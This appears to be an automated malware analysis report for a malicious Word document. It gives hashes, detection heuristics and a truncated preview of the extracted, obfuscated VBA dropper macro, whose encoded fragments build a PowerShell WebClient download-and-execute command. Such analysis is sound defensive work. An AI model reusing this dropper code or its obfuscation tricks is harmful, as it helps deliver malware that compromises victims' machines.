Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bdb47b82d2d2b36…

MALICIOUS

Office (OLE)

113.0 KB Created: 2018-02-16 21:00:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: db4b78d780922f06a33bd4c818916f4e SHA-1: 74520694bc4aa3530a3756921ad5199640b31a25 SHA-256: 1bdb47b82d2d2b36058c57d37695a5f0aebb4c37bac79058ff2946973765e122
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, which is a common auto-execution technique, uses a Shell() call to download and execute a payload from the provided URL. This indicates a dropper functionality, aiming to deliver a second-stage malicious component.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6450757-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450757-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://college-deYw1+Yw1-bai9APm8+PmdmlCtSzimBXoTKLMWGfotYh In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34130 bytes
SHA-256: fdd51b2ad0de278bf8fdc3a4f5ae3f1c4f48d1cb9fd2314d4ee95731d69ffe4d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nAGOEAqJriPKt"
Function hEoabtP()
On Error Resume Next
kAVRlWfsP = 4754426 / ChrB(9412911 + CBool(5502241)) / 1655382 * VNUHwXm * (XERPrO / fkCoqRm / 5349370 - CByte(8239960) / 4601568 - ksSQsGowiA)
LzAmlF = 3209176 / ChrB(3036443 + CBool(19512)) / 7636253 * ozCRiDiNGo * (oSzjldjRmtpHL / asfNOUC / 60868 - CByte(2856436) / 5564105 - ZZpbFfMcwRWB)
QnCEaOjwjE = 9830850 / ChrB(2855763 + CBool(7586221)) / 6130772 * AhwsqFHKwAr * (roDUwLDu / hOciNuDrjwboU / 9902199 - CByte(6394578) / 5766324 - iUhQGfUIGdThC)
PvUbAKqBV = (vXGjzvtbl) + ?HIUbhhuGKUsad("ppolASEktUh49),[sTriNG][char]39).REPLAce(([char]71+[char]86+[char]68),[sTriNG][char]36)| . ( $eNV:ComSPEc[4,15,25]-JOIN'')aHcZkUrbhLdq", 12, 111)
fznLdopu = 7842065 / ChrB(4252752 + CBool(8149342)) / 463329 * jMaajIWGQk * (ivrDcj / HjFIiwo / 5684015 - CByte(731468) / 5692812 - ozqAaAZQsjN)
KKvDAXaijiQ = 8441385 / ChrB(4333371 + CBool(8892248)) / 3703757 * nGZbuI * (iWXaid / GEsYcnSiVriM / 7606763 - CByte(6044366) / 8841782 - iOKnAXiBnfpI)
GBIsJZamOv = 5754319 / ChrB(595438 + CBool(4836527)) / 8205601 * GcJzwRfqJliz * (VcoioMXqlia / kwzKARSnYhCko / 7047124 - CByte(9386928) / 5935410 - rmwDFKNTvOMSwU)
LjnWIa = (NdLDTSBQiX) + ?HIUbhhuGKUsad("qXHjrARsWAqnPqZkcRwwVHFYw1+Yw1FdmU/T09AUPm8+Pm8+9AUX.Spl9AU+9AUit9AU+9AU(Pm8+Pm8T0X9AU+9AU?9AU+9AUT0X'+')9AU+9AU;I9AUpkppZ", 21, 97)
zHYiDH = 5787682 / ChrB(7447377 + CBool(5950201)) / 7314218 * qEDFUcMIBjWb * (PhTftvWnPCKzaC / zFVjizpFPK / 8078201 - CByte(6410573) / 5199982 - CNhnwiMc)
bqnPsoiT = 9665928 / ChrB(8681056 + CBool(6773880)) / 2911311 * aBsIuZmKwKnsza * (DUDOvWNpdJ / YNUGczTAPD / 4540262 - CByte(558741) / 9193052 - oGGCtu)
XaWhfqwYP = 9403434 / ChrB(799256 + CBool(7060478)) / 4884696 * pUTaNLOwQB * (pphnYwKYf / HGHQGmkO / 6393940 - CByte(3857228) / 5468532 - dniAaBrJEfFOQR)
njJHuo = (tDPsuuw) + ?HIUbhhuGKUsad("UdPsQoTnBnhpIkrhKPzXRwU'+'.9'+'AU+9AUWebCli9AU+9AUent;I9AU+9AU6NNPm8+Pm8SB = I9AU+9AU69'+'AU+9AUNnsaYw1+Yw1dasdWfAaAcXpzwa", 23, 89)
TBQaCzjM = 8854221 / ChrB(2230351 + CBool(8843760)) / 1708132 * XJjWNcBsz * (QisiaQCSFRoQ / SfUwYRWFbwzbkf / 4398934 - CByte(9564825) / 1108079 - TKRIzrA)
GcZjTbfcONN = 1307761 / ChrB(6303421 + CBool(8457782)) / 8732660 * rjGOOrtfcacj * (iuHqkfUzEVGc / jcwRli / 2398248 - CByte(7543294) / 930070 - UVRfEak)
AdiIaTN = 8620859 / ChrB(6576862 + CBool(6667392)) / 3695053 * wsQvMYon * (AlELQiL / zWBdjnUTzQZU / 5483692 - CByte(4582435) / 8905264 - PfEBpSnwRzTkM)
hXHdl = (KGZdkihz) + ?HIUbhhuGKUsad("tJqEwwR]Pm8+Pm8113+[cPm8+Pm8HARYw1+Yw1]56),[cHPm8+Pm8AR]'+'96 -REplaPm8+Pm8Yw1+Yw1CE ([cHA'+'RYw1+Yw1'+']73+[cHAR]54JhAEJWRfbdYsGtiTbROviWICpkkJ", 7, 110)
WHjNlvHIw = 8271383 / ChrB(2599239 + CBool(9234260)) / 7031076 * KAfjDMhTkG * (cjvZniZbQwF / EiizNqt / 9856247 - CByte(4654323) / 634562 - ODEcNbi)
KqKbFZHOFT = 7246660 / ChrB(2144981 + CBool(4081191)) / 6456776 * iYMpInUUfEn * (EUOTdqHHYS / ViFLAhMurXz / 9958126 - CByte(4783787) / 237592 - kLDii)
izkwvimDw = 2047048 / ChrB(3085843 + CBool(5793973)) / 4642127 * MPIUNaHQsqHDc * (nSJvDGUp / cFwDqkVF / 834984 - CByte(6433377) / 3625715 - REaizpjjKthj)
dVLYGG = (FvcNIPTlc) + ?HIUbhhuGKUsad("fzvtwivTsdSdKU.Net9AU+9ADTTpdDfItHcTk", 14, 11)
IcfimqBNN = 4258694 / ChrB(2708345 + CBool(6743283)) / 3292832 * QlJHiY * (TuUUldQ / RTYLNaYDKZqMZD / 4840499 - CByte(362149) / 3500846 - UAmNq)
DfXRQJrqwc = 9576499 / ChrB(8176999 + CBool(736384)) / 569359 * MBzZFOPCp * (DfsiwirLn / VSChJPID / 5570103 - CByte(5080159) / 4078420 - XBqIZR)
OGwEHdSzIT = 1283214 / ChrB(2209839 + CBool(7693527)) / 4308746 * uzoHEOI * (iQmBtz / QpGLZPCu / 1654540 - CByte(8375613) / 8345526 - IZFbczGHiUHE)
OIujPsdMOiU = (WRjWlCVJj) + ?HIUbhhuGKUsad("RoruPCqfbjaMmcAU+9AU6N'+'9AU+ZqNaBomiuafV", 15, 15)
XjvCwCbjA = 7821605 / ChrB(1881711 + CBool(412200)) / 7632957 * kviBWFvLBXru
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.